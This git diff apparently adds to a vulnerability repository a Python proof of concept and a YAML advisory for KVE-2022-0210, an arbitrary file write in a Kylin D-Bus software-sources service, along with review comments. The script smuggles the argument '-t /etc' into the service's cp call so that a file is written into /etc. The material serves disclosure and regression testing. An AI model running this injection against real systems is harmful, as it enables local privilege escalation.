diff --git a/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py b/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
new file mode 100644
index 0000000000000000000000000000000000000000..19f07b572ec81ef3c62f753df99ad704c7f65abf
--- /dev/null
+++ b/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+
+import sys
+import dbus
+import os
+
+def set_main_source(target_dir, src_file):
+ bus = dbus.SystemBus()
+ obj = bus.get_object("com.kylin.software.properties", "/com/kylin/software/properties")
+ proxy = dbus.Interface(obj, "com.kylin.software.properties.interface")
+ proxy.setMainSource([f'-t {target_dir} {src_file}'])
+ os.system('touch set_main_source.txt')
+
+set_main_source("/etc", os.path.realpath('./set_main_source.txt'))
+os.system('ls -l /etc/set_main_source.txt')
+os.system('rm set_main_source.txt')
\ No newline at end of file
diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..60a558db3cf25e1206bce95cdea6a0960084ba92
--- /dev/null
+++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
@@ -0,0 +1,19 @@
+id: KVE-2022-0210
+source: openKylin Community
+info:
+ name: 源管理服务的setMainSource接口任意文件写入漏洞。
+ severity: critical
+ description: |
+ com.kylin.software.properties.interface.setMainSource接口存在任意文件写入漏洞。实现方法是调用命令"cp file /etc/apt/sources.list"。但如果传递的参数为"['-t /etc /path/to/evil.txt'],由于开发者在实现时会将这个字符串按空格进行分割,并作为参数传递到cp命令,因此就会触发命令 "cp -t /etc /path/to/evil.txt /etc/apt/sources.list",从而实现任意文件夹的任意文件写入,导致权限提升。任意命令。
+ scope-of-influence:
+ kylin-software-properties< 0.0.1-127
+ reference:
+ - https://kylinos.cn/support/loophole/patch/1871.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: None
+ cwe-id: None
+ cnvd-id: None
+ kve-id: KVE-2022-0210
+ tags: kve2022,dbus
\ No newline at end of file
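Review bot: The outcome check at the end of the script is not reliable for confirming a fix: `os.system('ls -l /etc/set_main_source.txt')` only prints a listing, and because the script removes only the local file and never the copy in /etc, a marker left by an earlier run makes a patched kylin-software-properties still look affected. Recording whether the marker already exists before the call and then reporting an explicit result, for example `hit = os.path.exists('/etc/set_main_source.txt')` followed by a printed verdict, would make the script usable as a regression check against the fixed version named in the advisory (0.0.1-127). The `proxy.setMainSource(...)` call is also unguarded, so a service that rejects the argument or is not installed would presumably end in a traceback rather than a "not affected" result; catching `dbus.exceptions.DBusException` around it would separate the two cases. `import sys` is unused, and a module docstring naming KVE-2022-0210 and the file the script leaves in /etc would help whoever has to clean up the test host.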
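Review bot: `severity: critical` disagrees with the CVSS data in the same record: the vector `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` with `cvss-score: 7.8` falls in the High band (7.0–8.9) of CVSS v3.1, so either the field should read `severity: high` or the vector needs revisiting. `cwe-id: None` could be filled in, since the description (a caller-supplied string split on spaces and handed to `cp` as arguments) matches CWE-88, argument injection; as written, the unquoted `None` values will also load as the string "None" rather than a null. The description text ends with a dangling fragment `任意命令。` and the example `"['-t /etc /path/to/evil.txt']` is missing its closing quote, both worth tidying before the entry is consumed by tooling.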
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 1148d39b288061b5602a642d94647f19ebbe57a5..475177cc68dc10ca7a74f844196d6247d9a49a8c 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -22,4 +22,6 @@ cve:
 polkit:
 - CVE-2021-4034
 cnvd:
-kve:
\ No newline at end of file
+kve:
+ kylin-software-properties
+ - KVE-2022-0210
\ No newline at end of file
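Review bot: The added key `kylin-software-properties` is missing its trailing colon, unlike `polkit:` in the context lines above, so it is not parsed as a mapping key with a list beneath it. A YAML loader will typically fold the two added lines into one plain scalar under `kve:` (or reject the file), which means any tooling that walks this index will not find KVE-2022-0210 under its package. The line should read `kylin-software-properties:`.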